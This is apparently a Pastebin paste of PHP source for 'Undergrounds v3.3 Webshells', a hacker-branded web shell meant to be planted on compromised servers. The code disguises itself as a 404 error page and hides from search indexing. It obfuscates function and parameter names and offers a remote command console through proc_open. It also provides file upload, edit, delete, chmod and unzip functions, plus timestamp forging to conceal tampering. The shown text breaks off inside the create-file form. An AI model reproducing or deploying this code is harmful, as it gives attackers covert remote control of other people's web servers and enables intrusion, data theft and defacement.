Untitled

b3gund4L

Apr 20th, 2025 (edited)

1,134

Never

Add comment

Not a member of Pastebin yet? Sign Up, it unlocks many cool features!

PHP 44.62 KB | None | 0 0

raw download clone embed print report

<?php
@ini_set('output_buffering', 0);
@ini_set('display_errors', 0);
set_time_limit(0);
ini_set('memory_limit', '64M');
header('Content-Type: text/html; charset=UTF-8');
?>
<?php
?>
<!DOCTYPE html>
<html>
<head>
<title>.::Undergrounds v3.3 Webshells::.</title>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="author" content="haxorqt">
<meta name="viewport" content="Kontol" />
<meta name="description" content="Error Page">
<meta property="og:description" content="Error Page">
<meta property="og:image" content="#">
<meta name="robots" content="noindex">
<meta name="googlebot" content="noindex">
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/[email protected]/dist/css/bootstrap.min.css">
<link href="https://fonts.googleapis.com/css2?family=Carrois+Gothic&display=swap" rel="stylesheet">
<link href="https://fonts.googleapis.com/css2?family=Bungee+Outline&display=swap" rel="stylesheet">
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/[email protected]/dist/css/bootstrap.min.css">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
</head>
<body>
<style>
@import url("https://fonts.googleapis.com/css?family=Dosis");
@import url("https://fonts.googleapis.com/css?family=Carrois+Gothic");
@import url("https://fonts.googleapis.com/css?family=Bungee+Outline");
body {
font-family: "Dosis", cursive;
color: #fff;
text-shadow:0px 0px 1px #757575;
background-color: #212529;
background-size: cover;
background-attachment: fixed;
background-repeat: no-repeat;
background-size: 7%, 7%;
background-position: right bottom, left bottom;
}
.directory-listing-table {
margin: auto;
background-color: #212529;
padding: .7rem 1rem;
max-width: 900px;
width: 100%;
box-shadow: 0 0 20px black;
border: 1px solid #ffc107;
}
.header {
margin: auto;
background-color: #212529;
padding: .7rem 1rem;
max-width: 100%;
width: 100%;
box-shadow: 0 0 20px black;
border-bottom: 1px solid #ffc107;
}
th {
border-top: 1px solid #fff;
border-bottom: 1px solid #fff;
}
tbody td {
font-size: 13px;
padding: 0.5rem;
color: #fff;
font-weight: 400;
font-family: "Roboto", "Poppins", sans-serif;
}
tbody td a {
text-decoration: none;
color: #fff;
}
tbody td:not(:first-child) {
text-align: center;
}
body::-webkit-scrollbar {
width: 14px;
}
body::-webkit-scrollbar-track {
background: #000;
}
body::-webkit-scrollbar-thumb {
background-color: #212529;
border: 3px solid #000;
}
input {
margin-bottom: 4px;
background: rgba(0,0,0,0.3);
border: none;
outline: none;
padding: 5px;
font-size: 15px;
color: #fff;
text-shadow: 1px 1px 1px rgba(0,0,0,0.3);
border: 1px solid rgba(0,0,0,0.3);
border-radius: 14px;
box-shadow: inset 0 -5px 45px rgba(100,100,100,0.2), 0 1px 1px rgba(255,255,255,0.2);
-webkit-transition: box-shadow .5s ease;
-moz-transition: box-shadow .5s ease;
-o-transition: box-shadow .5s ease;
-ms-transition: box-shadow .5s ease;
transition: box-shadow .5s ease;
}
textarea {
max-width: 100%;
max-height: 100%;
padding-left: 2px;
resize: none;
overflow: auto;
color: #fff;
text-shadow: 1px 1px 1px rgba(0,0,0,0.3);
border: 1px solid rgba(0,0,0,0.3);
border-radius: 4px;
box-shadow: inset 0 -5px 45px rgba(100,100,100,0.2), 0 1px 1px rgba(255,255,255,0.2);
-webkit-transition: box-shadow .5s ease;
-moz-transition: box-shadow .5s ease;
-o-transition: box-shadow .5s ease;
-ms-transition: box-shadow .5s ease;
transition: box-shadow .5s ease;
background: rgba(0,0,0,0.3);
}
.badge-action-edit:hover::after {
content: "Edit"
}
.badge-action-rename:hover::after {
content: "Rename"
}
.badge-action-chmod:hover::after {
content: "Chmod"
}
.badge-action-delete:hover::after {
content: "Delete"
}
.badge-action-download:hover::after {
content: "Download"
}
.badge-action-unzip:hover::after {
content: "UnZip"
}
.badge-action-tanggal:hover::after {
content: "ChDate"
}
.badge-action-unzip:hover::after,
.badge-action-download:hover::after,
.badge-action-delete:hover::after,
.badge-action-chmod:hover::after,
.badge-action-rename:hover::after,
.badge-action-tanggal:hover::after,
.badge-action-edit:hover::after {
padding: 5px;
border-radius: 10px;
margin-left: -40px;
color: #ffc107;
border: 2px solid #ffc107;
background-color: #212529;
}
.badge-action-unzip:hover::after,
.badge-action-download:hover::after,
.badge-action-delete:hover::after,
.badge-action-chmod:hover::after,
.badge-action-rename:hover::after,
.badge-action-tanggal:hover::after,
.badge-action-edit:hover::after {
width: 68px;
text-align: center;
margin-top: -53px;
display: block;
position: absolute;
font-size: 14px;
}
textarea::-webkit-scrollbar {
width: 12px;
}
textarea::-webkit-scrollbar-track {
background: #000000;
}
textarea::-webkit-scrollbar-thumb {
background-color: #212529;
border: 3px solid black;
}
a {
color: #fff;
text-decoration: none;
}
a:hover {
color: #999797;
text-shadow:0px 0px 2 0px #ED360E;
}
input,select,textarea {
border: 1px #000000 solid;
-moz-border-radius: 5px;
-webkit-border-radius:5px;
border-radius:5px;
}
select:after {
cursor: pointer;
}
.pencet {
background-color: rgb(0 0 0 / 57%);
color: #fff;
border-color: blanchedalmond;
}
.crot {
border-radius: 50%;
padding: 15px;
width: 100px;
height: 100px;
}
.haxorqt-text {
font-size: 19pt;
font-family: "Carrois Gothic", cursive;
color: #fff;
text-align: center;
background: linear-gradient(200deg, #000000 25%, #ffffff 50%, #ffffff 75%, #ffffff 100%);
background-size: 200% auto;
-webkit-background-clip: text;
-webkit-text-fill-color: transparent;
animation: animate 1.2s linear infinite;
}
@keyframes animate{ to { background-position: 200% center;
}
}
body, a, button:link{cursor:url(https://raw.githubusercontent.com/GanestSeven/script/refs/heads/main/cursorpnis-removebg-preview.png),
default;
}
button:hover {
cursor:url(https://raw.githubusercontent.com/GanestSeven/script/refs/heads/main/cursorpnis-removebg-preview.png),
wait;
}
a:hover {
cursor:url(https://raw.githubusercontent.com/GanestSeven/script/refs/heads/main/cursorpnis-removebg-preview.png),
wait;
}
</style>
</td>
<script>
function myFunction() {
var copyText = document.getElementById("myInput");
copyText.select();
copyText.setSelectionRange(0, 99999); // For mobile devices
navigator.clipboard.writeText(copyText.value);
alert("Copied Successfully!!");
}
</script>
<?php
error_reporting(0);
set_time_limit(0);
@clearstatcache();
@ini_set('error_log', null);
@http_response_code(404);
$web = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? "https" : "http") . "://".$_SERVER['HTTP_HOST'];
$disfunc = @ini_get("disable_functions");
if (empty($disfunc)) {
$disf = "<font color='lime'>AMAN</font>";
} else {
$disf = "<font color='red'>".$disfunc."</font>";
}
function author() {
echo "</div><table class='directory-listing-table'><td><center><font face='Carrois Gothic' size='3px'>2017 © haxorqt | Haxorqt team</center></td></table><br>";
exit();
}
function cekdir() {
if (isset($_GET['path'])) {
$serlok = $_GET['path'];
} else {
$serlok = getcwd();
}
if (is_writable($serlok)) {
return "<font color='lime'>Aman Coy</font>";
} else {
return "<font color='red'>KONTOL!</font>";
}
}
function cekroot() {
if (is_writable($_SERVER['DOCUMENT_ROOT'])) {
return "<font color='lime'>Aman Coy</font>";
} else {
return "<font color='red'>KONTOL!</font>";
}
}
function haxorqt_ex($file) {
$pile = $file;
$pch = pathinfo($pile, PATHINFO_FILENAME);
return $pch;
}
function xrmdir($dir) {
$items = scandir($dir);
foreach ($items as $item) {
if ($item === '.' || $item === '..') {
continue;
}
$path = $dir.'/'.$item;
if (is_dir($path)) {
xrmdir($path);
} else {
unlink($path);
}
}
rmdir($dir);
}
function net($hexnet) {
for ($i = 0; $i < strlen($hexnet); $i++) {
$haxorqt .= dechex(ord($hexnet[$i]));
}
return $haxorqt;
}
function owner($file) {
if (function_exists("posix_getpwuid")) {
$tod = @posix_getpwuid(fileowner($file));
return "<center>".$tod['name']."</center>";
} else {
return "<center>".fileowner($file)."</center>";
}
}
function cekwrite($serlok) {
$izin = substr(sprintf('%o', fileperms($serlok)), -4);
if (is_writable($serlok)) {
return "<font color=lime>".$izin."</font>";
} else {
return "<font color=red>".$izin."</font>";
}
}
function cmd($gas, $serlok) {
$crot = $gas;
$pr = "proc_open";
if (function_exists($pr)) {
$tod = @proc_open($crot, array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "r")), $crottz, $serlok);
echo "".stream_get_contents($crottz[1])."</textarea></center><br>";
} else {
echo "<font color='orange'></font>";
}
}
function ekse($coman, $serlok) {
$ler = "2>&1";
if (!preg_match("/".$ler."/i", $coman)) {
$coman = $coman." ".$ler;
}
$komen = $coman;
$pr = "proc_open";
if (function_exists($pr)) {
$tod = @$pr($komen, array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "r")), $crottz, $serlok);
echo "<pre><textarea rows='25' style='color:lime;' readonly='' cols='120px'>
".htmlspecialchars(stream_get_contents($crottz[1]))."</textarea></pre><br>";
} else {
echo "<font color='orange'>proc_open function is disabled!!</font>";
}
}
function ipserv() {
if (empty($_SERVER['SERVER_ADDR'])) {
return gethostbyname($_SERVER['SERVER_NAME']);
if (empty(gethostbyname($_SERVER['SERVER_NAME']))) {
return $_SERVER['SERVER_NAME'];
}
} else {
return $_SERVER['SERVER_ADDR'];
}
}
function cekfile($file) {
return '<i class="fa fa-file-code-o" style="font-size:17px;color:#456DEB;"></i>';
}
function filedate($file) {
return date("F d Y g:i:s", filemtime($file));
}
function fext($file) {
$sub = "\163\x75" . "\142\x73" . "\x74\x72";
return $sub(strrchr($file,'.'),1);
} function gazz($file) {
$fbiasa = array("php","phtml","shtml","phar","php7","html","htm","inc","phps","txt","js","css","htaccess","bin","pl","py","sh","php58","PhP7","aspx","dll","ini");
$notf = array("jpeg","jpg","png","gif","ico","webp","mp3","m4A","flac","wav","wma","3gp","ogg","webm","mp4","exe");
$stl = "\x73\x74" . "\162\164" . "\157\154\x6f" . "\167\x65\162";
$ext=$stl(fext($file));
if ($file == 'error_log') {
return "
<button type='submit' class='btn btn-outline-secondary badge-action-edit' name='pilih' value='edit'>
<i class='fa fa-edit' style='color: #36F239'></i></button>
<button type='submit' class='btn btn-outline-light badge-action-rename' name='pilih' value='gantinama'>
<i class='fa fa-pencil' style='color: #fff'></i></button>
<button type='submit' class='btn btn-outline-secondary badge-action-chmod' name='pilih' value='chmod'>
<i class='fa fa-gear' style='color: #06D2D5'></i></button>
<button type='submit' class='btn btn-outline-secondary badge-action-tanggal' name='pilih' value='chdate'>
<i class='fa fa-calendar' style='color: #4542F9'></i></button>
<button type='submit' class='btn btn-outline-secondary badge-action-delete' name='pilih' value='hapus'>
<i class='fa fa-trash' style='color: #E53A3A'></i></button>
<button type='submit' class='btn btn-outline-secondary badge-action-unzip' name='pilih' value='unzip'>
<i class='fa fa-file-archive-o' style='color: #F1BE0F'></i></button>";
} elseif(in_array($ext,$fbiasa)) {
return "
<button type='submit' class='btn btn-outline-secondary badge-action-edit' name='pilih' value='edit'>
<i class='fa fa-edit' style='color:#7AFF41'></i></button>
<button type='submit' class='btn btn-outline-light badge-action-rename' name='pilih' value='gantinama'>
<i class='fa fa-pencil'></i></button>
<button type='submit' class='btn btn-outline-info badge-action-chmod' name='pilih' value='chmod'>
<i class='fa fa-gear'></i></button>
<button type='submit' class='btn btn-outline-primary badge-action-tanggal' name='pilih' value='chdate'>
<i class='fa fa-calendar'></i></button>
<button type='submit' class='btn btn-outline-danger badge-action-delete' name='pilih' value='hapus'>
<i class='fa fa-trash'></i></button>";
} elseif(in_array($ext,$notf)) {
return "
<button type='submit' class='btn btn-outline-light badge-action-rename' name='pilih' value='gantinama'>
<i class='fa fa-pencil'></i></button>
<button type='submit' class='btn btn-outline-info badge-action-chmod' name='pilih' value='chmod'>
<i class='fa fa-gear'></i></button>
<button type='submit' class='btn btn-outline-primary badge-action-tanggal' name='pilih' value='chdate'>
<i class='fa fa-calendar'></i></button>
<button type='submit' class='btn btn-outline-danger badge-action-delete' name='pilih' value='hapus'>
<i class='fa fa-trash'></i></button>";
} elseif($ext == 'zip') {
return "
<button type='submit' class='btn btn-outline-light badge-action-rename' name='pilih' value='gantinama'>
<i class='fa fa-pencil'></i></button>
<button type='submit' class='btn btn-outline-info badge-action-chmod' name='pilih' value='chmod'>
<i class='fa fa-gear'></i></button>
<button type='submit' class='btn btn-outline-primary badge-action-tanggal' name='pilih' value='chdate'>
<i class='fa fa-calendar'></i></button>
<button type='submit' class='btn btn-outline-danger badge-action-delete' name='pilih' value='hapus'>
<i class='fa fa-trash'></i></button>
<button type='submit' class='btn btn-outline-warning badge-action-unzip' name='pilih' value='unzip'>
<i class='fa fa-file-archive-o'></i></button>";
} else {
return "
<button type='submit' class='btn btn-outline-secondary badge-action-edit' name='pilih' value='edit'>
<i class='fa fa-edit' style='color:#7AFF41'></i></button>
<button type='submit' class='btn btn-outline-light badge-action-rename' name='pilih' value='gantinama'>
<i class='fa fa-pencil'></i></button>
<button type='submit' class='btn btn-outline-info badge-action-chmod' name='pilih' value='chmod'>
<i class='fa fa-gear'></i></button>
<button type='submit' class='btn btn-outline-primary badge-action-tanggal' name='pilih' value='chdate'>
<i class='fa fa-calendar'></i></button>
<button type='submit' class='btn btn-outline-danger badge-action-delete' name='pilih' value='hapus'>
<i class='fa fa-trash'></i></button>";
}
}
function unzip($file, $serlok) {
if (!is_readable($file)) {
red("<table class='directory-listing-table' style='color:orange;'><thead><td><font color='orange'>Cannot Unzip File / Unreadable File !</font></td></thead></table>");
die();
} elseif (strpos(file_get_contents($file), "\x50\x4b\x03\x04") === false) {
echo "<table class='directory-listing-table' style='border-color:red;'><td><font color='red'><center><i class='fa fa-exclamation-triangle' aria-hidden='true'></i> This isn't Zip File</center></font></td></table>";
die();
}
$zip = new ZipArchive;
$res = $zip -> open($file);
if ($res == true) {
$zip -> extractTo($serlok);
$zip -> close();
echo "<table class='directory-listing-table' style='border-color:lime;'> <td>Unzip File Successfully => <font color='lime'>".basename($_POST['path'])."</font><br>
Extract to : <font color='aqua'>".$file."</font></td></thead</table>";
} else {
echo "<table class='directory-listing-table' style='border-color:red;'><td><i class='fa fa-exclamation-triangle' aria-hidden='true'></i> Failed to Unzip File!!</font></td></table>";
}
exit();
}
foreach($_POST as $key => $value){
$_POST[$key] = stripslashes($value);
}
if(isset($_GET['path'])){
$serlok = $_GET['path'];
$serlok2 = $_GET['path'];
} else {
$serlok = getcwd();
$serlok2 = getcwd();
}
$serlok = str_replace('\\','/',$serlok);
$serloks = explode('/',$serlok);
$serlokbos = @scandir($serlok);
echo '<table class="header"><td><center>
<div style="font-family:Bungee Outline;font-size:24px;"><a href="'.$_SERVER['SCRIPT_NAME'].'"><i class="fa-brands fa-napster"></i> haxorqt</a></center></div></td><td>';
echo '<table align="center"><td>
<div class="btn-group me-2" role="group" aria-label="First group">
<button type="button" onclick=location.href="'.$_SERVER['SCRIPT_NAME'].'" class="btn btn-outline-light"><font color="aqua"><i class="fa fa-home"></i> Home</font></button>
<div class="btn-group me-2" role="group" aria-label="First group">
<button type="button" onclick=location.href="?path='.$serlok.'&'.net("cmd").'=opet" class="btn btn-outline-light"><i class="fa fa-terminal"></i> Console</button>';
echo '<button type="button" onclick=location.href="?path='.$serlok.'&'.net("upload").'=opet" class="btn btn-outline-light"><i class="fa fa-upload"></i> Upload</button>
<button type="button" class="btn btn-outline-light"onclick=location.href="?path='.$serlok.'&'.net("info").'=opet"><i class="fa fa-info-circle"></i> information</button>
<button type="button" class="btn btn-outline-light" onclick=location.href="?path='.$serlok.'&'.net("buatfile").'=opet"><i class="fa-solid fa-file-circle-plus" style="color:#1F5ACF;"></i> Create File</button>
<button type="button" class="btn btn-outline-light" onclick=location.href="?path='.$serlok.'&'.net("buatfolder").'=opet" style="float: right;"><i class="fa-solid fa-folder-plus" style="color:#FAA625;"></i> Create Folder</button>
<button type="button" class="btn btn-outline-light" onclick=location.href="?path='.$serlok.'&'.net("about").'=opet" style="float: right;"><i class="fa fa-info"></i> About</button>
</td></tr></div>
</div></div></td></table></table><br>';
echo '<table class="directory-listing-table"><td><i class="fa fa-folder" style="color:#F19013;"></i> <b>:</b> ';
foreach($serloks as $id => $lok){
if($lok == '' && $id == 0){
echo '<a href="?path=/">/ </a></center>';
continue;
}
if($lok == '') continue;
echo '<a href="?path=';
for($i=0; $i<=$id; $i++){
echo $serloks[$i];
if($i != $id) echo "/";
}
echo '">'.$lok.'</a> / ';
}
echo '</td></thead></table><br>';
if (isset($_REQUEST['logout'])) {
session_start();
session_destroy();
echo '<script>window.location="'.$_SERVER['SCRIPT_NAME'].'";</script>';
}
if (isset($_GET['viewfile'])) {
$files = basename($_GET['viewfile']);
echo "<table class='directory-listing-table'><td><center>Filename : <font color='orange'>$files</font>";
echo '<form method="POST" action="?pilihan&path='.$serlok.'">';
echo "<table width='20%' border='0' cellpadding='0' cellspacing='0' align='center'><td>
<a href='?path=$serlok' class='btn btn-outline-light'><i class='fa fa-arrow-left'></i> back</a>";
echo gazz($file);
echo "<button type='button' style='float:right;' class='btn btn-outline-light' onclick='myFunction()'><i class='fa fa-copy'></i> Copy</button></div><br><br>";
echo "<input type='hidden' name='type' value='file'>
<input type='hidden' name='name' value='$files'>
<input type='hidden' name='path' value='$serlok/$files'>";
echo "<textarea readonly='' cols=120 rows=30 id='myInput'>".htmlspecialchars(file_get_contents($_GET['viewfile']))."</textarea></td></table></table><br>";
exit();
} elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "hapus") {
if (is_dir($_POST['path'])) {
xrmdir($_POST['path']);
if (file_exists($_POST['path'])) {
echo '<table class="directory-listing-table" style="border-color:red;"><td><center><font color="red"><i class="fa fa-exclamation-triangle" aria-hidden="true"></i> Failed to delete Directory</font></center></td></table>';
} else {
echo '<table class="directory-listing-table" style="border-color:lime;"><td><center><font color="lime"><i class="fa fa-trash"></i> Folder removed</font></center></td></table>';
}
} elseif (is_file($_POST['path'])) {
@unlink($_POST['path']);
if (file_exists($_POST['path'])) {
echo "<table class='directory-listing-table' style='border-color:red;'><td><center><font color='red'><i class='fa fa-exclamation-triangle' aria-hidden='true'></i> Failed to Delete File</font></center></td></table>";
} else {
echo "<table class='directory-listing-table' style='border-color:lime;'><td><center><i class='fa fa-trash'></i> File removed <font color='lime'>".basename($_POST['path'])."</font></center></td></table>";
}
}
exit();
} elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "gantinama") {
if (isset($_POST['gantin'])) {
$namabaru = $_GET['path']."/".$_POST['newname'];
if (@rename($_POST['path'], $namabaru) === true) {
echo "<table class='directory-listing-table' style='border: 1px solid lime;'><td><center><font color='lime'>Change Name Success<center></td></table><br>";
if ($_POST['type'] == "file") {
echo "<table class='directory-listing-table'><td><center>Filename : <font color='orange'>".basename($_POST['newname'])."</font><br><br>";
} else {
echo "<table class='directory-listing-table'><td><center><center>Folder : <font color='orange'>".basename($_POST['newname'])."</font><br>";
}
echo '<form method="post">
<div class="input-group mb-1" style="width:300px;">
<input name="newname" type="text" class="form-control" size="20" placeholder="New name" />
<input type="hidden" name="path" value="'.$_POST['newname'].'">
<input type="hidden" name="pilih" value="gantinama">';
if ($_POST['type'] == "file") {
echo '<input type="hidden" name="type" value="file">';
} else {
echo '<input type="hidden" name="type" value="dir">';
}
echo '<input type="submit" value="Change" name="gantin" class="btn btn-outline-light mb-1">
</div></form></td></table>';
} else {
echo "<table class='directory-listing-table' style='border: 1px solid red;'><td><center><font color='red'><i class='fa fa-exclamation-triangle' aria-hidden='true'></i> FAILED TO CHANGE NAME</font></center></td></table>";
}
} else {
if ($_POST['type'] == "file") {
echo "<table class='directory-listing-table'><td><center>Filename <font color='orange'>: ".basename($_POST['path'], $_GET['file'])."</font><br><br>";
} else {
echo "<table class='directory-listing-table'><td><center>Folder <font color='orange'>: ".basename($_POST['path'])."</font><br><br>";
}
echo '
<form method="post">
<div class="input-group mb-1" style="width:300px;">
<input name="newname" type="text" class="form-control" size="20" placeholder="New name" />
<input type="hidden" name="path" value="'.$_POST['path'].'">
<input type="hidden" name="pilih" value="gantinama">';
if ($_POST['type'] == "file") {
echo '<input type="hidden" name="type" value="file">';
} else {
echo '<input type="hidden" name="type" value="dir">';
}
echo '<input type="submit" value="Change" name="gantin" class="btn btn-outline-light mb-1"/>
</div></form></td></table><br>';
} exit();
} elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "edit") {
if (isset($_POST['gasedit'])) {
$edit = file_put_contents($_POST['path'], $_POST['src']);
if ($edit == true) {
echo "<table class='directory-listing-table' style='border: 1px solid lime;'><td><center><font color='lime'>File saved Successfully</font></center></td></table><br>";
} else {
echo "<table class='directory-listing-table' style='border: 1px solid red;'><td><center><font color='red'><i class='fa fa-exclamation-triangle' aria-hidden='true'></i> Can't save file/Permission Denied</font></center></td></table><br>";
}
}
echo "<center><table class='directory-listing-table'><td><center> Filename : <font color='orange'>".basename($_POST['path'])."</font><br><br>";
echo '<form method="post">
<div class="btn-group me-2" role="group" aria-label="First group">
<a href="?path='.$serlok.'" class="btn btn-outline-light"><i class="fa fa-arrow-left"></i> back</a>
<button type="submit" name="gasedit" class="btn btn-outline-light"style="width:250px;">
<i class="fa fa-save"></i> Save</button>
<button type="button" class="btn btn-outline-light" onclick="myFunction()"><i class="fa fa-copy"></i> Copy</button></div><br><br>
<textarea type="text" cols=120 id="myInput" rows=30 name="src">'.htmlspecialchars(@file_get_contents($_POST['path'])).'</textarea><br>
<input type="hidden" name="path" value="'.$_POST['path'].'">
<input type="hidden" name="pilih" value="edit">
</form><br></td></thead></table><br>'; exit();
} elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "chdatef") {
$filedate = basename($_POST['path']);
$tgl = date("F d Y g:i:s", filemtime($_POST['path']));
echo "<table class='directory-listing-table'><td>
<form method='post'><center>
<font color='#fff'>Ubah Tanggal<br>Folder :</font> <font color='orange'>$filedate</font>
<br>$tgl<br><br><div class='input-group mb-3' style='width:280px;'>
<input name='tanggal' type='text' class='form-control' value='".$_POST['tanggal']."' placeholder='$tgl'/>
<input type='hidden' name='path' value='".$_POST['path']."'>
<input type='hidden' name='pilih' value='chdatef'>
<button type='submit' class='btn btn-outline-light mb-1' name='change' value='change'>Change</button></div></form></center></td></table>";
if (isset($_POST['change'])) {
$tanggal = strtotime($_POST['tanggal']);
if (@touch($_POST['path'], $tanggal) == true) {
echo "<br><table class='directory-listing-table' style='border: 1px solid lime;'><td><center><font color='lime'><center>Changed Successfully!!</font></center></td></table>";
} else {
echo "<br><table class='directory-listing-table' style='border: 1px solid red;'><td><center><font color='red'><i class='fa fa-exclamation-triangle' aria-hidden='true'></i> Failed to change date!!</td></table>";
}
}exit();
} elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "chdate") {
$filedate = basename($_POST['path']);
$tgl = date("F d Y g:i:s", filemtime($_POST['path']));
echo "<table class='directory-listing-table'><td>
<form method='post'><center><font color='#fff'>Ubah Tanggal<br>File :</font> <font color='orange'>$filedate <br></font>$tgl
<br><br><div class='input-group mb-3' style='width:300px;'>
<input name='tanggal' type='text' class='form-control' value='".$_POST['tanggal']."' placeholder='$tgl'/>
<input type='hidden' name='path' value='".$_POST['path']."'>
<input type='hidden' name='pilih' value='chdate'>
<button type='submit' class='btn btn-outline-light mb-1' name='change' value='change'>Change</button>
</div></form></center></td></table>";
if (isset($_POST['change'])) {
$tanggal = strtotime($_POST['tanggal']);
if (@touch($_POST['path'], $tanggal) == true) {
echo "<br><table class='directory-listing-table' style='border: 1px solid lime;'><td><center><font color='lime'><center>Changed Successfully!!</font></center></td></table>";
} else {
echo "<br><table class='directory-listing-table' style='border: 1px solid red;'><td><center><font color='red'><i class='fa fa-exclamation-triangle' aria-hidden='true'></i> Failed to change date!!</td></table>";
}
}exit();
} elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "chmodf") {
$files = basename($_POST['path']);
$sbr = 'substr'; $spr = 'sprintf'; $flperm = 'fileperms';
echo "<table class='directory-listing-table'><td>
<br><center> <font color='#fff'>Folder : <font color='orange'>$files</font> (".$sbr($spr('%o',$flperm($_POST['path'])), -4).")<br><br>
<form method='post'>
<div class='input-group mb-3' style='width:230px;'>
<input type='text' name='mod1' maxlength='4' class='form-control' height='10' value='".$_POST['mod1']."' placeholder='0755' required/>
<input type='hidden' name='path' value='".$_POST['path']."'>
<input type='hidden' name='pilih' value='chmodf'>
<button type='submit' class='btn btn-outline-light mb-1' name='ganti' value='ganti'>Change</button>
</div></form></td></table>";
if (isset($_POST['ganti'])) {
$opet = @chmod($_POST['path'], octdec($_POST['mod1']));
if ($opet == true) {
echo "<br><table class='directory-listing-table' style='border: 1px solid lime;'><td><center><font color='lime'>Changed Successfully!!</font></center></td></table>";
} else {
echo "<table class='directory-listing-table' style='border: 1px solid red;'><td><center><font color='red'><i class='fa fa-exclamation-triangle' aria-hidden='true'></i> Failed to change!!</font></center></td></table>";
}
}exit();
} elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "chmod") {
$files = basename($_POST['path']);
$sbr = 'substr'; $spr = 'sprintf'; $flperm = 'fileperms';
echo "<table class='directory-listing-table'><td>
<center><font color='#fff'>Filename : <font color='orange'>$files</font> (".$sbr($spr('%o',$flperm($_POST['path'])), -4).")<br><br>
<form method='post'>
<div class='input-group mb-3' style='width:230px;'>
<input type='text' name='mod1' class='form-control' maxlength='4' height='10' value='".$_POST['mod1']."' placeholder='0644' required/>
<input type='hidden' name='path' value='".$_POST['path']."'>
<input type='hidden' name='pilih' value='chmod'>
<br><br><button type='submit' class='btn btn-outline-light mb-1' name='ganti' value='ganti'>Change</button></div>
</form></td></table>";
if (isset($_POST['ganti'])) {
$opet = @chmod($_POST['path'], octdec($_POST['mod1']));
if ($opet == true) {
echo "<br><table class='directory-listing-table' style='border: 1px solid lime;'><td><center><font color='lime'>Changed Successfully!!</font></center></td></table>";
} else {
echo "<table class='directory-listing-table' style='border: 1px solid red;'><td><center><font color='red'><i class='fa fa-exclamation-triangle' aria-hidden='true'></i> Failed to change!!</font></center></td></table>";
}
}exit();
} elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "unzip") {
unzip($_POST['path'], $serlok);
} elseif ($_REQUEST[net('upload')] == "opet") {
echo "<table class='directory-listing-table'><td><center>
<form method='POST' enctype='multipart/form-data' id='upload'><h5><i class='fa fa-upload'></i> UPLOAD FILES<h5>
<div class='input-group' style='width:360px;'>
<input type='file' name='haxorqtfile' id='haxorqt' style='background-color: grey;' class='form-control' name='uplod'>
<input type='submit' class='btn btn-outline-light' for='inputGroupFile02' name='uplod' value='Upload'></div>
</form></center></td></table>";
if (isset($_POST['uplod'])) {
if ($_POST['dirnya'] == "2") {
$serlok = $_SERVER['DOCUMENT_ROOT'];
}
if (empty($_FILES['haxorqtfile']['name'])) {
echo "<br><table class='directory-listing-table' style='border-color:orange;'><td><font color='orange'><center><i class='fa fa-exclamation-triangle' aria-hidden='true'></i> File not selected</center></font>";
} else {
$data = @file_put_contents($serlok."/".$_FILES['haxorqtfile']['name'], @file_get_contents($_FILES['haxorqtfile']['tmp_name']));
if (file_exists($serlok."/".$_FILES['haxorqtfile']['name'])) {
$fl = $serlok."/".$_FILES['haxorqtfile']['name'];
echo "<br><table class='directory-listing-table' style='border-color:lime;'><td>
Uploaded => <font color='lime'><i>".$_FILES['haxorqtfile']['name']."</i></font><br>";
if (strpos($serlok, $_SERVER['DOCUMENT_ROOT']) !== false) {
$lwb = str_replace($_SERVER['DOCUMENT_ROOT'], $web."/", $fl);
echo "Link : <a href='".$lwb."' target='_blank'><font color='lime'>Click here</font></a></td></table><br>";
}
echo "<br>";
} else {
echo "<br><table class='directory-listing-table' style='border-color:red;'><td><font color='red'><center>There was an error uploading your file.</font></td></table>";
}
}
}exit();
} elseif ($_GET[net('cmd')] == "opet") {
echo "<table class='directory-listing-table'><td>";
echo '<br><form method="post"><center>
<div class="input-group" style="width:600px;">
<span class="input-group-text mb-1">Command :</span>
<input type="text" class="form-control" name="komen" id="comandnya" value="'.$_POST['komen'].'" placeholder="uname -a" required>
<button type="submit" name="comandeks" value="execute" class="btn btn-outline-light mb-1">>></button></div></form><br><center>';
if (isset($_POST['comandeks'])) {
ekse($_POST['komen'], $serlok);
}
echo "</center></td></table><br></center>";
exit();
} elseif ($_REQUEST[net('about')] == "opet") {
echo "<table class='directory-listing-table'><thead><td><div style='font-family: Bungee Outline;font-size:24px;'>
<img class='crot' src='https://i.pinimg.com/564x/84/0e/4c/840e4c57fab2ba6279b377ae8dc333d3.jpg'/> Priv shell uwu edition</div><hr>
<br> - haxorqt shell v3.3 <br> - Created by haxorqt</td></thead></table>"; exit();
} elseif ($_REQUEST[net('buatfile')] == "opet") {
function createfile(){
$pat = $_GET['path'];
$nama_file = $_POST['nama_file'];
$isi_file = $_POST['isi_file'];
$handle = fopen("$pat/$nama_file", 'w');
$files = $_GET['path']."/".$nama_file;
$asu = str_replace($_SERVER['DOCUMENT_ROOT'], $web. "", $files);
if (fwrite($handle, $isi_file)) {
echo '<table class="directory-listing-table" style="border-color:lime;"><td>Created => <font color="lime">'.$pat.'/'.$nama_file.'<br></font>Link : <a href="'.$asu.'" target="_blank"><font color="aqua"><i>Click here</i></a></font></td></table>';
} else {
echo '<table class="directory-listing-table" style="border-color:red;"><td><font color=red><i class="fa fa-exclamation-triangle" aria-hidden="true"></i> Failed to create file..!!</font></script></td></table>';
}
} if(!isset($_POST['bikin'])) {
echo "<center><table class='directory-listing-table'><td width='12%''>
<form method='POST'>
<input type='text' value='file.php' placeholder='Nama File' style='width: 525px;' name='nama_file' autocomplete='off'><br><br>
<textarea name='isi_file' rows='20' cols='100' placeholder='Hello World!'></textarea><br>
